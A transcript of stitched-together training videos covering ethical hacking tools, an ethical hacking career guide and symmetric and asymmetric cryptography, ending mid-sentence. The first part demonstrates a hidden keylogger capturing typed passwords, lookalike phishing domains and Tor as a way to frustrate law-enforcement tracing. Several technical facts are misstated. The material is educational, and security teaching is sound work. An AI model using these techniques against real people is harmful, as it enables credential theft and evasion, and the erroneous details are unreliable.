torrenting, for streaming, for connection features. So there are a lot of VPNs out there. So for example, let's go to the website cyberghost.com. So you can see there's a sale going on, 76% sale, or you can go on to ExpressVPN, which is also a very good VPN. Then there is NordVPN. It depends on what you want and how you want to utilize it. So just purchasing a VPN or getting a free VPN is not enough. It depends on which country the VPN originates from and which server you're connected to. For example, most of the countries have a pact where they share information amongst themselves even if you're connected to a VPN. That means that these companies that provide these services have to generate and store logs, and these logs have to be reported to the government if they ask for it. Now, if there's a list of 14 countries that actually focuses on this practice, so you have to find out VPN that and a server that is not a part of those 14 countries and ensure that those logs are not going to be reported to the government. And these are 3 VPNs basically are something that which are good, and I personally use CyberGhost. I've used the others. I just keep on rotating them just to get an idea of which one is better. So these are VPNs that can allow you to anonymize yourself on the internet. Moving on, these are the ones that we talked about. There are others: Safer VPN, Hide My Ass, Express VPN, and so on and so forth. From our terminologies, let's now talk about VPS. VPS is basically virtual private server, where you can rent a service or server as a service, a virtual machine as a service. So basically on a cloud, using infrastructure as a service, you can rent a server and utilize it for whatever activity you want. So let's go to these sites: register.com, GoDaddy Network Solutions, or we can talk about other cloud solutions as well. So here you can get register your domain names. So in the previous exercise, for let's say when we talked about the phishing exercise, what we want is we can go on to register.com, or we can go on to GoDaddy.com, and we can purchase a particular domain. For example, something like this. Instead of the O's, I'm typing in a couple of zeros for the Facebook, and let's see if anything of that is available. Now something.photo is available, or facetips.com is available. There are other options that are making over here that they're giving us over here. And once we purchase this, we can then have our own hosting with a web hosting as a service. And we can have a Linux-based hosting, or a Windows-based hosting, depending on what you want. And that's where your shared hosting comes into the picture. If you just want, if you want to look at a virtual server and you want to rent a server over there itself, you can move on to rackspace.com, and here in your services, you can have physical server or a virtual server in a public cloud. Your other cloud providers, for example, would be Amazon, AWS, and on AWS, you can basically look at EC2, Elastic Compute Cloud, which is basically virtual servers in the cloud. And over here, you can rent out a server with whatever capacity you require. You'll obviously have to pay the rent for what those servers are going to cost. But once you have those servers, you can then launch any services on top of it. Looking at other services that we have, we talked about Tor. Tor is a onion routing software that allows users to browse the web anonymously. So we can just go online and we can try to spoof our identity, and I'm going to show you how. So I've got a VMware workstation right here, so we're just going to pull that up, and we're going to power on a Windows 7 machine where we're going to look at the onion routing. So our Windows machine has booted up. We're just going to log in, and this is my Windows 7 machine. Now I've got a Chrome browser right here, and we're going to go to a website called seemyip.com, which is going to give the IP address that I'm currently using. So right now I'm not connected to any VPN or anything, and you can see that's my IP address that I'm utilizing. Now if I want to anonymize myself, what I'm going to do is I am going to use Tor, and that's the Tor browser that's set up right there. If I click on it, it's going to open up the software, and it's going to create a new network, and it's going to connect to the Tor network and allow me to anonymize myself. Right, so that's the Tor browser opening up and giving me a new browser over here. So I've got one, which is the old one, which is my current IP address. If I just refresh that, you'll see that I'm still on the same IP address as far as this browser is concerned. There's a refresh, and it's still showing me the same IP address. Where if I go on to Tor right now, and if I go to seemyip.com, you will see that it is going to give me, and you can see the amount of time it is taking to reach that site. That's because I am using a VPN, and there's a lot of encryption running off, and you can see now I'm suddenly connected via Hong Kong. And even to reach this site, what Tor does is it gives me a proxy chain. A proxy chain is where it creates multiple hops to hide my identity, and before I reach seemyip.com, I am using 3 different IP addresses over here. One in France, one in Germany, and one in Hong Kong. So if I do something over here to trace back my steps to my actual IP address, the law enforcement agencies or anyone who's going to search, like a forensic investigator, would have to go through these IP addresses before they come back to me. Now it's not impossible, but the effort and time that's going to be taken to come across 3 different countries is going to be phenomenal. So it may just defeat the purpose of having so much resources spent to identify who did what. So that's what Tor does for us. Alright, moving on from Tor, we are going to look at Keyloggers. Keyloggers are basically softwares that run in the background and record all the keystrokes of the user. So if I've got a Keylogger installed right now, whatever I type will be stored in a text file for the hacker so that they can look at it later on. And just to give you an example of that, we go back to my VMware workstation and we open up another Windows 7 machine. I'm going to power this on, and I'm going to close this one till then. So this virtual machine has booted up. We are going to use user 1. login as user 1. Just close all these softwares which are not required. And once this machine is booted up, what we're going to do is I'm just going to open up a random websites and see what we're doing. Basically, there's a keylogger that's there in the startup that's going to record our keystrokes. And we just want to see what it actually does. Now, Firefox is getting updated, so let's hold on. Now, this is the latest version of Firefox, right? And we're just going to go to, let's say, facebook.com. Wait for the website to open up. All right, let's try opening it up again. And that's facebook.com. And we're just going to type in some random username and password someone at somewhere.com, and the password being again asd@1234567890. Login, obviously that login is not going to work. User probably doesn't exist, or if it does, the password probably is incorrect. And so we're going to close this. We're going to, let's say, open up another browser window, go to another site, rediff.com, and then go to rediff mail. Try the same thing over here. Someone at somewhere.com. Password asd@12345678, whatever it is. Don't say, we can see the combination is incorrect. Now there's a keylogger running in the background, and what we want is we now want to open up the keylogger. Now it is visible here because I've kept it visible. You can hide it in the start menu, and there's a shortcut key for you to pull it up later on. So this completely becomes invisible. And what it can do is it basically creates a record of whatever you have been doing so far. So you can see these things populating on the 25th of December. So if I look at the visited websites, you can see I opened up Mozilla Firefox, the first where there was a problem loading the page. Then we opened up Facebook, then we opened up rediffmail.com, and so on and so forth. So it just gives me the list of visited websites. Whereas if I look at keystrokes and clipboard, you will see whatever we have typed in. So we first typed in facebook.com. Then again, the second time I try to type in, then I hit backspace. Then I type in facebook.com. And then you can see I typed in someone at somewhere.com, and in tab asd@1234567890. We closed up the browser. We opened up a new one, and we went on to rediffmail.com. And then you can see me typing this one, then going back one space, then the rest of what I typed, and then the password coming in. So that's what a keylogger does. If you look at the taskbar, it's not going to show you a keylogger running in the background. It's in the processes, you're not going to see anything at all, but it's going to mask itself as a service. So if you look into the properties, you can see that icon coming in over here, which matches this one. And so you can see that this is masking itself as a service.exe. If this gets hidden as well, it would be very difficult for a user to even identify this. All right, so that's what a keylogger is. Moving on, let's see what else we want to talk about. So we've talked about Tor, we've talked about keyloggers, and now we want to talk about firewalls. Now, for keyloggers to be prevented, we need antiviruses, right? So we need a good antivirus program that's going to be installed, updated, and run on a regular basis to protect ourselves from malwares. But what about network connections? And you need a firewall and a system to prevent or to detect what kind of connections are going on in the first place. Now, we cannot rely on software 100%. So even if a firewall is not configured properly, that's going to be a problem. So what we need to do is we have to have a firewall, configure it correctly, and then allow and disallow certain activity from happening. And what we're going to do is, I've got such a system on my machine here. I use a software called Glasswire. What it does is it is a network analyzer. So it allows me to analyze whatever is going on. You can see all the apps that I'm utilizing and how much upload and download they have been doing, all the traffic. So you can see the protocols that I'm utilizing. So I come to know what's going on in the background. And this gives me the entire graph of how much I have been doing for the past 24 hours, past 3 hours, past 5 minutes, and so on and so forth. Right, so this is what the activities, and these are the alerts that it has been generating. I can click on those alerts and it will start telling me what it was all about. If the graph doesn't work for me, it gives me usage as well. So how much I have utilized since I've installed this software, right? And what applications have been utilized, which hosts have been connected to, and the traffic type that was utilized. And then the things on my network. So these are the devices that I have currently on my network that have been identified. And then comes the firewall. So on the firewall is clicked on. You see all those services that have been identified, and you can just click on a particular service to lock that service. So this becomes a discovery tool, identifies whatever networking is going on, gives me all that information, and then I can look at and I can just click on any of these services that I find it as malicious and block them. I can create different profiles for different applications as and when I want them. And these are the alerts. So you can see that this was the first time a network connection was looked at from VMware. And what this allows me to do is whenever I execute a file, it can upload it to virustotal.com and scan it as a third-party antivirus to ensure that there is nothing malicious on it. So I already have an antivirus over here, but if this ever gets compromised, I still can rely on a third-party service where in real time when I execute my applications, they would be verified and I would be assured that nothing is wrong with my system. And this software that I'm utilizing, Glasswire Basic, is free, and then there are paid versions as well. It's just glasswire.com is where you're going to find this. Moving on, rootkit. Rootkits are also malicious softwares that you allow an unauthorized user to have access to a computer to restrict areas of its software. Now, a rootkit in a sense is a malicious software that infects a machine and prevents some functionality from it, like hiding data or preventing users from running antiviruses. And it's basically a malicious software that is used to hide information from the victim so that they would not realize that they have actually been compromised. It's going to be a difficult showing of a rootkit, so I cannot show that demo to you. So we're just going to move on, and we are going to talk about ethical hacking techniques now. Now, when we say ethical hacking techniques, we want to look at what kind of audits are available when we want to do ethical hacking. So there's a black box audit, a white box audit, and a gray box audit. So if I'm invited in an organization to conduct a test, to conduct a audit, to conduct a vulnerability assessment or a penetration test, to identify vulnerabilities and then try to plug them out, they are going to give me 3 different variations. In a black box audit, they're not going to tell me about the infrastructure. They're not going to give me any information, and they want me to start from the basics of gathering information, identifying the systems, and based on the information that I gather, whether I'm able to develop any hacks and compromise their infrastructure. So it will be a simulation of a hacker who's sitting outside the organization and trying to find a way in. Whereas a white box audit is where full infrastructure knowledge is given, anything and everything that is required for an audit is given. And this is a simulation of an insider attack, a person sitting inside the organization misusing their permissions and then trying to compromise, trying to get access to data that they do not have access to. So the simulation is from a malicious insider. A gray box is where some partial knowledge is available, and from that partial knowledge you're going to try to build up more information, and then you're going to try to get access to those resources. What are the tools that we utilize? So we've already had a couple of demos on Keyloggers, SQL injection, SQL map, and so on and so forth. Metasploit is a very much used tool for penetration testing, and having knowledge on Metasploit is very much necessary as far as ethical hacking is concerned. Nmap, this is a tool used for network discovery. Nessus, a vulnerability scanner. Wireshark is a packet capturer that allows you to capture packets and analyze whatever is going on. SQL map is something that we have seen, a SQL injection attack tool which generates its own queries. And John the Ripper is a password cracking tool. Backtrack used to be an operating system that was utilized for penetration testing. However, Backtrack has now been replaced by something called Kali Linux, and that's the operating system that we have utilized in all our demos where we try to look at SQL map and those injection attacks that we did. So what are the areas of ethical hacking? We have just talked about all these areas as well. Network services, we looked at the Glasswire application that showed us how my machine is consuming networks, which protocols are being consumed, how the connections are being created. If somebody is able to install a Trojan on my machine, it is going to try to create a new connection on the network with the hacker to allow that hacker a backdoor access. Now, if I have that Glasswire or a similar firewall implemented, it is this firewall that is going to detect it and prevent that connection from happening. So if I install a software that is suddenly suspicious or that installs something else in the background that I may not be aware of, that tool is going to identify all the connections that are being made and it is going to highlight that connection. I need to go through all of those connections and identify whether they are legit or not. And if I find some suspicious or doubtful, I'm going to block that connection and then I'm going to investigate what's going on. And that's where ethical hacking comes into the picture. You want to find out if your firewall that you have implemented is going to work correctly or not. If the configuration of the firewall is done properly, or if the firewall is misconfigured, is it leaking out information, right? At the same time, you're looking at web applications. We looked at the OWASP broken web application where we did some SQL injection attacks, right? So that was a weakness or a vulnerability in that application, which would allow us to bypass authentication and get access to resources that we were not authorized for. And then client-side attacks would be where you install Keylogger at the end of the client system, and then you try to capture whatever data the user is typing in, like usernames and passwords on the Facebook and the rediffmail.com website that we saw, and then try to misuse that information to get access to those resources. Then Wi-Fi networks, right? Wi-Fi is something that we use on a regular basis. We got our smart devices nowadays, smartphones, tablets, phablets, that we connect to Wi-Fi and start using all our services, our banking applications on our smartphones. And thus we want to ensure that wireless connectivity is simple and is secured. So you want to use encryption mechanisms, you want to use tools on your smartphones, antiviruses, firewalls on your smartphones to ensure that whatever you are utilizing is going to remain secure. And then social engineering, we've looked at the phishing website on facebook.com. We've seen how easy it is to clone websites and host them on Apache server. So if you look at it as from an ethical hacker's perspective, the job of an ethical hacker is to simulate these kind of attacks that a hacker may conduct. And first of all, you're basically going to find out areas where these attacks can happen. Think of it from a hacker's perspective. Try to simulate those attacks and see if those attacks are going to be effective. Can those attacks be prevented? And can your current security controls that you have put in place identify, detect, and prevent these attacks from happening in the first place? And that is what ethical hacking is all about.
With the increase in the number of cybercrimes across the globe, there is also an increase in the number of cybersecurity jobs, and the role of an ethical hacker tops the list. Hi guys, this is Shruti from Simplilearn, and today I will run you through this video on ethical hacking career. So let's get started and explore the world of ethical hacking. Let's begin with a few facts. Did you know that by the year 2021, there will be 3.5 million cybersecurity job openings? That is a huge number, isn't it? And also, according to the US Bureau of Labor Statistics, there will be 28% increase in the number of jobs from 2016 to 2026 for information security analysts, which includes ethical hackers. This proves that there is a great demand for ethical hackers at the moment. As I mentioned earlier, the number of cybercrimes across the world will increase as the digital era will only continue to grow. Organizations will be on the lookout to hire professionals who can fight these cybercrimes and protect the company's data. And to fight these cybercrimes, we will require individuals who can think like a hacker. And who is that? Well, to do this job, we have ethical hackers. As you might be knowing, an ethical hacker is trained to discover system vulnerabilities. An ethical hacker is also known as a white hat hacker. He or she is given authorization from the company to perform security assessments. And at the end, an ethical hacker would have to report the findings back to the company so that the vulnerabilities can be fixed. An ethical hacker performs these security assessments with the help of various hacking techniques and tools. Let's now move on to our next topic, that is the steps to become an ethical hacker. You might wonder how to start your ethical hacking career, right? Well, I will take you through that step by step. Firstly, the candidate must have a computer science or an information technology bachelor's degree. It is also possible to become an ethical hacker without these degrees, but provided you have the required skill sets and experience. The next requirement to be an ethical hacker is that the candidate must have a minimum of 2 years of experience in the information security field. You have to start your career with a software or a networking job, and only then can you move on to the ethical hacking field. You have to start your career with a software or a networking job, and only then can you move into the ethical hacking field. Coming to the certifications, it is necessary for the candidate to hold various cybersecurity certifications. Certifications play a vital role in the field of cybersecurity. Your job opportunities can solely depend on these certifications. To become an ethical hacker, you can start off with the foundational level certifications such as the CCNA and CompTIA Security Plus certifications. Finally, the last step to become an ethical hacker is to clear the Certified Ethical Hacker examination. CEH certification is provided by the EC Council. It trains the candidate to protect a company's network by using the same tools and methods that a hacker would use. The CEH exam will have a duration of 4 hours with 125 number of questions. If the candidate clears this exam, then he or she will become a certified ethical hacker. Now that you know the steps to become an ethical hacker, let's look into the skill sets which are required to help you achieve these steps. First and foremost, an ethical hacker needs to have an in-depth knowledge of the working of the operating systems. Knowledge of Windows, Linux, and Macintosh operating systems is required. For penetration testing, creating exploits, and bug hunting, programming will be important. So knowledge of programming languages such as C, C++, HTML, Python, and PHP will be very helpful. Basic knowledge of networking, TCP/IP protocols, and OSI model is necessary as networking is the foundation of cybersecurity. For securing databases, knowledge of SQL, NoSQL, PostgreSQL is necessary. Cryptography is used to secure information. It is the process of converting data from a readable format to a non-readable format and vice versa. Cryptanalysis is decryption without a secret key. In most cases, certified ethical hacker would need to perform cryptanalysis. Hence, ethical hacker has to be comfortable with cryptography and cryptanalysis. Ethical hackers should be proficient in network security control measures such as intrusion detection and intrusion prevention techniques. Now let's move on to the responsibilities which are taken care of by an ethical hacker. Let's have a look at these responsibilities. An ethical hacker is responsible for scanning systems, open and closed ports using tools like Nessus and Nmap. Vulnerabilities and threats are identified by doing this. In addition to scanning for vulnerabilities, they also search the deep corners of the network to spot critical information such as passwords, which can make the organization vulnerable to an attack. In addition to building and maintaining IDS, IPS, and firewalls, they also try to evade these security measures to gauge the performance of the systems. A lot of times, a company's online fraud or online theft incidents are looked into by an ethical hacker. An ethical hacker also checks for sniffing networks and hijacked web servers and applications. Those were the responsibilities of an ethical hacker. Now let's look into the various job roles an ethical hacker can apply for. It is a misconception that an ethical hacker will perform only penetration testing. Well, there are a number of other jobs an ethical hacker can apply for. The different job roles such as that of a penetration tester, information security analyst, security consultant, and an information security manager. Let's have a look at each of these job roles one by one. A penetration tester performs the typical responsibility of an ethical hacker. That is, he or she tries to exploit a security system's vulnerabilities. This is carried out using different hacking tools and techniques. An ethical hacker can also apply for the role of an information security analyst. There is a difference between the job roles of a penetration tester and that of an information security analyst. Here, the candidate will be required to primarily design and protect the organization's network from various cyber attacks. Finally, the candidate is also required to document the identified security breaches so that it can be omitted the next time. The responsibilities of a security consultant is more or less similar to that of an information security analyst that we saw previously. As a security consultant, you will be responsible to design, implement, and maintain various security architectures. In addition to this, you're also required to upgrade the security systems as and when required. Finally, an ethical hacker can also apply to the role of an information security manager. As the name suggests, this role will require the candidate to possess managerial skills, as an information security manager is responsible to head the IT and the information security team. Now that we have seen the responsibilities, the skills, and the steps to become an ethical hacker, let's have a look at the different companies hiring ethical hackers. To name a few, we have Bank of America, Ernst & Young, KPMG, Urban Pro, and IBM. Let's now look into the salary structure of an ethical hacker. Well, in India, the average annual salary of a certified ethical hacker is nearly 4,76,000 rupees. And in the US, the average annual salary of a certified ethical hacker is $91,000. Now I will guide you through a sample resume of a penetration tester. As you can see on your screens, this is a sample resume of a penetration tester. We will look into this resume closely and understand how your resume should look like if you are applying for the role of a penetration tester. As always, you can start off with your name and your email ID and your phone number, followed by a brief summary of your current job profile. It is preferred to add your LinkedIn profile link here, and also your GitHub profile link if you have one. As I mentioned earlier, this is a sample resume for a penetration tester, and hence we have to have more than 2 years of experience in the information security field. As you can see under the experience section, the candidate has 2 prior experiences, out of which the first experience is that of a software tester and second is that of a penetration tester. You would have to mention your latest or current experience at the beginning. You can mention your job role and the company and the duration, under which you can list out the various responsibilities that you are looking into currently. If you are a penetration tester, you can mention responsibilities such as security monitoring, black box testing, documentation of the results, vulnerability scanning, and so on. Below this, you can mention your first company's experience with the roles and responsibilities that you have performed earlier. Here, the candidate was a software tester before becoming a penetration tester. Let's move on to the education section. Here, the candidate holds a bachelor's degree in computer science. You can mention your degree followed by the university name. Or if you're applying for any other role in the cybersecurity domain, it is recommended that you list out the certifications as well. To start off with, a CCNA certification will be preferred, followed by a certified ethical hacker certification, which is a must if you are applying for the role of a penetration tester. In addition to it, the Certified Expert Penetration Tester certification will also hold a great advantage. After mentioning the certifications, you can go ahead and mention your skill sets. Here we have the technical skills and non-technical skills. Under technical skills, you can mention the programming languages that you know. Here we have C, C++, Java, Perl. You can also mention the operating systems that you have worked on. For example, Windows, Linux, Unix. And in addition to the programming languages and the OS, you can also mention the tools that you know, such as Nmap, Metasploit tools, which will be helpful if you are applying for the role of a penetration tester. Then you can also mention encryption technologies, knowledge of SQL, and bug tracking systems if you have worked on them before. If you have participated in ecodathons, you can mention that here as well. Under the non-technical skills, you can mention various competitions that you have taken part in and the games that you like and other extracurricular activities. Finally, you can also mention the projects undertaken. Under the projects undertaken, you can talk about the various projects that you have performed in your company or outside the company. Here, we have 2 projects, one as a software test engineer and second one as a penetration tester. So this is how a resume of a penetration tester will look like.
Choose from over 300 in-demand skills and get access to 1,000 plus hours of video content for free. Visit SkillUp by Simplilearn. Click on the link in the description to know more.
With the rise in censorship and general fear over privacy laws, consumer security is at an all-time high risk. Technology has made our lives so much easier while putting up a decent target on our personal information. It is necessary to understand how to simultaneously safeguard our data and be up to date with the latest technological developments. Maintaining this balance has become easier with cryptography taking its place in today's digital world. So here's a story to help you understand cryptography. Meet Anne. Anne wanted to look for a decent discount on the latest iPhone. She started searching on the internet and found a rather shady website that offered a 50% discount on the first purchase. Once Anne submitted her payment details, a huge chunk of money was withdrawn from a bank account just moments after. Devastated, Anne quickly realized she had failed to notice that the website was a HTTP web page instead of an HTTPS one. The payment information submitted was not encrypted and it was visible to anyone keeping an eye, including the website owner and hackers. Had she used a reputed website which has encrypted transactions and employs cryptography, our iPhone enthusiast could have avoided this particular incident. This is why it's never recommended to visit unknown websites or share any personal information on them. Let's now understand what cryptography is. Cryptography is the science of encrypting or decrypting information to prevent unauthorized access. We transform our data and personal information so that only the correct recipient can understand the message. As an essential aspect of modern data security, using cryptography allows the secure storage and transmission of data between willing parties. Encryption is the primary route for employing cryptography by adding certain algorithms to jumble up the data. Decryption is the process of reversing the work done by encrypting information so that the data becomes readable again. Both of these methods form the basis of cryptography. For example, when Simplilearn is jumbled up or changed in any format, not many people can guess the original word by looking at the encrypted text. The only ones who can are the people who know how to decrypt the coded word, thereby reversing the process of encryption. Any data pre-encryption is called plain text or clear text. To encrypt the message, we use certain algorithms that serve a single purpose of scrambling the data to make them unreadable without the necessary tools. These algorithms are called ciphers. They are a set of detailed steps to be carried out one after the other to make sure the data becomes as unreadable as possible until it reaches the receiver. We take the plain text, pass it to the cipher algorithm, and get the encrypted data. This encrypted text is called the ciphertext, and this is the message that is transferred between the two parties. The key that is being used to scramble the data is known as the encryption key. These steps, that is the cipher and the encryption key, are made known to the receiver, who can then reverse the encryption on receiving the message. Unless any third party manages to find out both the algorithm and the secret key that is being used, they cannot decrypt the messages, since both of them are necessary to unlock the hidden content. Wonder what else we would lose if not for cryptography? Any website where you have an account can read your passwords. Important emails can be intercepted and their contents can be read without encryption during their transit. More than 65 billion messages are sent on WhatsApp every day, all of which are secured thanks to end-to-end encryption. There is a huge market opening up for cryptocurrency, which is possible due to blockchain technology that uses encryption algorithms and hashing functions to ensure that the data is secure. If this is of particular interest to you, you can watch our video on blockchain, the link of which will be in the description. Of course, there is no single solution to a problem as diverse as explained. There are three variants of how cryptography works and is in practice. They are symmetric encryption, asymmetric encryption, and hashing. Let's find out how much we have understood until now. Do you remember the difference between a cipher and ciphertext? Leave your answers in the comments, and before we proceed, if you find this video interesting, make sure to give it a thumbs up before moving ahead. Let's look at symmetric encryption first. Symmetric encryption uses a single key for both the encryption and decryption of data. It is comparatively less secure than asymmetric encryption, but much faster. It is a compromise that has to be embraced in order to deliver data as fast as possible without leaving information completely vulnerable. This type of encryption is used when data rests on servers and identifies personnel for payment applications and services. The potential drawback with symmetric encryption is that both the sender and receiver need to have the same secret key, and it should be kept hidden at all times. Caesar cipher and Enigma machine are both symmetric encryption examples that we will look into further. For example, if Alice wants to send a message to Bob, she can apply a substitution cipher or a shift cipher to encrypt the message. But Bob must be aware of the same key itself, so he can decrypt it when he finds it necessary to read the entire message. Symmetric encryption uses one of the two types of ciphers, stream ciphers and block ciphers. Block ciphers break the plain text into blocks of fixed size and use the key to convert it into ciphertext. Stream ciphers convert the plain text into ciphertext one bit at a time instead of resorting to breaking them up into bigger chunks. In today's world, the most widely used symmetric encryption algorithm is AES 256, that stands for Advanced Encryption Standard, which has a key size of 256-bit with 128-bit and 196-bit key sizes also being available. Other primitive algorithms like the Data Encryption Standard, that is the DES, the Triple Data Encryption Standard 3DES, and Blowfish have all fallen out of favor due to the rise of AES. AES chops up the data into blocks and performs 10 plus rounds of obscuring and substituting the message to make it unreadable. Asymmetric encryption, on the other hand, has a double whammy at its disposal. There are two different keys at play here, a public key and a private key. The public key is used to encrypt information pre-transit and a private key is used to decrypt the information post-transit. If Alice wants to communicate with Bob using asymmetric encryption, she encrypts the message using Bob's public key. After receiving the message, Bob uses his own private key to decrypt the data. This way, nobody can intercept the message in between transmissions, and there is no need for any secure key exchange for this to work, since the encryption is done with the public key and the decryption is done with a private key that no one except Bob has access to. Both the keys are necessary to read the full message. There is also a reverse scenario where we can use the private key for encryption and the public key for decryption. A server can sign non-confidential information using its private key, and anyone who has its public key can decrypt the message. This mechanism also proves that the sender is authenticated and there is no problem with the origin of the information. RSA encryption is the most widely used asymmetric encryption standard. It is named after its founders Rivest, Shamir, and Edelman, and it uses block ciphers that separate the data into blocks and obscure the information. Widely considered the most secure form of encryption, albeit relatively slower than AES, it is widely used in web browsing, secure identification, VPNs, emails, and chat applications. With so much hanging on the key's secrecy, there must be a way to transmit the keys without others reading our private data. Many systems use a combination of symmetric encryption and asymmetric encryption to bolster security and match speed at the same time. Since asymmetric encryption takes longer to decrypt large amounts of data, the full information is encrypted using a single key, that is, symmetric encryption. That single key is then transmitted to the receiver using asymmetric encryption, so you don't have to compromise either way. Another route is using the Diffie-Hellman key exchange, which relies on a one-way function and is much tougher to break into. The third variant of cryptography is termed as hashing. Hashing is the process of scrambling a piece of data beyond recognition. It gives an output of fixed size, which is known as the hash value of the original data, or just hash in general. The calculations that do the job of messing up the data collection form the hash function. They are generally not reversible without resilient brute force mechanisms and are very helpful when storing data on website servers that need not be stored in plain text. For example, many websites store your account passwords in a hashed format so that not even the administrator can read your credentials. When a user tries to log in, they can compare the entered password's hash value with the hash value that is already stored on the servers for authentication, since the function will always return the same value for the same input. Cryptography has been in practice for centuries. Julius Caesar used a substitution shift to move alphabets a certain number of spaces beyond their place in the alphabet table. A spy can't decipher the original message at first glance. For example, if he wanted to pass confidential information to his armies and decides to use the substitution shift of +2, A becomes C, B becomes D, and so on. The word attack, when passed through a substitution shift of +3, becomes DWWDEFN. This cipher has been appropriately named the Caesar cipher, which is one of the most widely used algorithms. The Enigma is probably the most famous cryptographic cipher device used in ancient history. It was used by the Nazi German armies in the World Wars. They were used to protect confidential political, military, and administrative information, and it consisted of 3 or more rotors that scrambled the original message depending on the machine's state at that time. The decryption is similar, but it needs both machines to stay in the same state before passing the ciphertext so that we receive the same plain text message. Let's take a look at how our data is protected while we browse the internet thanks to cryptography. Here we have a web-based tool that will help us understand the process of RSA encryption. We see the entire workflow from selecting the key size to be used until the decryption of the ciphertext in order to get the plain text back. As we already know, RSA encryption algorithm falls under the umbrella of asymmetric key cryptography. That basically implies that we have two keys at play here, a public key and a private key. Typically, the public key is used by the sender to encrypt the message, and the private key is used by the receiver to decrypt the message. There are some occasions when this allocation is reversed, and we will have a look at them as well. In RSA, we have the choice of key size. We can select any key from a 512-bit to 1024-bit all the way up to a 4096-bit key. The longer the key length, the more complex the encryption process becomes, and thereby strengthening the ciphertext. Although with added security, more complex functions take longer to perform the same operations on similar size of data. We have to keep a balance between both speed and strength, because the strongest encryption algorithms are of no use if they cannot be practically deployed on systems around the world. Let's take a 1024-bit key over here. Now we need to generate the keys. This generation is done by functions that operate on passphrases. The tool we are using right now generates these pseudo-random keys to be used in this explanation. Once we generate the keys, you can see the public key is rather smaller than the private key, which is almost always the case. These two keys are mathematically linked with each other. They cannot be substituted with any other key, and in order to encrypt the original message or decrypt the ciphertext, this pair must be kept together. The public key is then sent to the sender, and the receiver keeps the private key with himself. In this scenario, let's try and encrypt a word Simplilearn. We have to select if the key being used for encryption is either private or public, since that affects the process of scrambling the information. Since we are using the public key over here, let's select the same and copy it and paste over here. The cipher we are using right now is plain RSA. There are some modified ciphers with their own pros and cons that can also be used, provided we use it on a regular basis and depending on the use case as well. Once we click on encrypt, we can see the ciphertext being generated over here. The pseudorandom generating functions are created in such a way that a single character change in the plaintext will trigger a completely different ciphertext. This is a security feature to strengthen the process from brute force methods. Now that we are done with the encryption process, let's take a look at the decryption part. The receiver gets this ciphertext from the sender with no other key or supplement. He or she must already possess the private key generated from the same pair. No other private key can be used to decrypt the message since they are mathematically linked. We paste the private key here and select the same. The cipher must also be the same used during the encryption process. Once we click decrypt, you can see the original plaintext we had decided to encrypt. This sums up the entire process of RSA encryption and decryption. Now some people use it the other way around. We also have the option of using the private key to encrypt information and the public key to decrypt it. This is done mostly to validate the origin of the message. Since the keys only work in pairs, if a different private key is used to encrypt the message, the public key cannot decrypt it. Conversely, if the public key is able to decrypt the message, it must have been encrypted with the right private key and hence the rightful owner. Here we just have to take the private key and use that to encrypt the plaintext and select the same in this checkbox as well. You can see we have generated a completely new ciphertext. This ciphertext will be sent to the receiver, and this time we will use the public key for decryption. Let's select the correct checkbox and decrypt, and we still get the same output. Now let's take a look at practical example of encryption in the real world. We all use the internet on a daily basis, and many are aware of the implications of using unsafe websites. Let's take a look at Wikipedia here. Pretty standard HTTPS website where the H stands for secured. Let's take a look at how it secures the data. Wireshark is the world's foremost and most widely used network protocol analyzer. It lets you see what's happening on your network at a microscopic level, and we are going to use this software to see the traffic that is leaving our machine and to understand how vulnerable it is. Since there are many applications running in this machine, let's apply a filter that will only show us the results related to Wikipedia. Let's search for something that we can navigate the website with. Okay, once we get into it a little, you can see some of the requests being populated over here. Let's take a look at the specific request. These are the data packets that basically transport the data from our machine to the internet and vice versa. As you can see, there's a bunch of gibberish data here that doesn't really reveal anything that we searched or watched. Similarly, other secured websites function the same way, and it is very difficult, if at all possible, to snoop on user data this way. To put this in perspective, let's take a look at another website, which is a HTTP web page. This has no encryption enabled from the server end, which makes it vulnerable to attacks. There is a login form here, which needs legitimate user credentials in order to grant access. Let's enter a random pair of credentials. These obviously won't work, but we can see the manner of data transfer. Unsurprisingly, we weren't able to get into the platform. Instead, we can see the data packets. Let's apply a similar filter that will help us understand what request this website is sending. These are the requests being sent by the HTTP login form to the internet. If we check here, see, whatever username and password that we are entering, we can easily see it with the Wireshark. Now, we used a dummy pair of credentials. If we select the right data packet, we can find our correct credentials. If any website had asked for our payment information or our legitimate credentials, it would have been really easy to get a hold of these. To reiterate what we have already learned, we must always avoid HTTP websites and just unknown or not trustworthy websites in general, because the problem we saw here is just the tip of the iceberg. Even though cryptography has managed to lessen the risk of cyber attacks, it is still prevalent and we should always be alert to keep ourselves safe online. There are two types of encryption in cryptography: symmetric key cryptography and asymmetric key cryptography. Both of these categories have their pros and cons and differ only by their implementation. Today we are going to focus exclusively on symmetric key cryptography. Let us have a look at its applications in order to understand its importance better. This variant of cryptography is primarily used in banking applications where personally identifiable information needs to be encrypted. With so many aspects of banking moving on to the internet, having a reliable safety net is crucial. Symmetric cryptography helps in detecting bank fraud and boosts the security index of these payment gateways in general. They are also helpful in protecting data that is not in transit and rests on servers and data centers. These centers house a massive amount of data that needs to be encrypted with a fast and efficient algorithm, so that when the data needs to be recalled by the respective service, there is the assurance of minor to no delay. While browsing the internet, we need symmetric encryption to browse secure HTTPS websites so that we get an all-around protection. It plays a significant role in verifying website server authenticity, exchanging the necessary encryption keys required, and generating a session using those keys to ensure maximum security. This helps us in preventing the rather insecure HTTP website format. So let us understand how symmetric key cryptography works first before moving on to the specific algorithms. Symmetric key cryptography relies on a single key for the encryption and decryption of information. Both the sender and receiver of the message need to have a pre-shared secret key that they will use to convert the plain text into ciphertext and vice versa. As you can see in the image, the key used for encryption is the same key needed for decrypting the message at the other end. The secret key shouldn't be sent along with the ciphertext to the receiver, because that would defeat the entire purpose of using cryptography. Key exchange can be done beforehand using other algorithms like the Diffie-Hellman key exchange protocol, for example. For example, if Paul wants to send a simple message to Jane, they need to have a single encryption key that both of them must keep secret to prevent snooping on by malicious actors. It can be generated by either one of them, but must belong to both of them before the messages start flowing. Suppose the message "I am ready" is converted into ciphertext using a specific substitution cipher by Paul. In that case, Jane must also be aware of the substitution shift to decrypt the ciphertext once it reaches her. Irrespective of the scenario where someone manages to grab the ciphertext mid-transit to try and read the message, not having the secret key renders everyone helpless looking to snoop in. The symmetric key algorithms like the data encryption standard have been in use since the 1970s, while the popular ones like the AES have become the industry standard today. With the entire architecture of symmetric cryptography depending on the single key being used, you can understand why it's of paramount importance to keep it secret on all occasions. The side effect of having a single key for the encryption and decryption is it becomes a single point of failure. Anyone who gets their hand on it can read all the encrypted 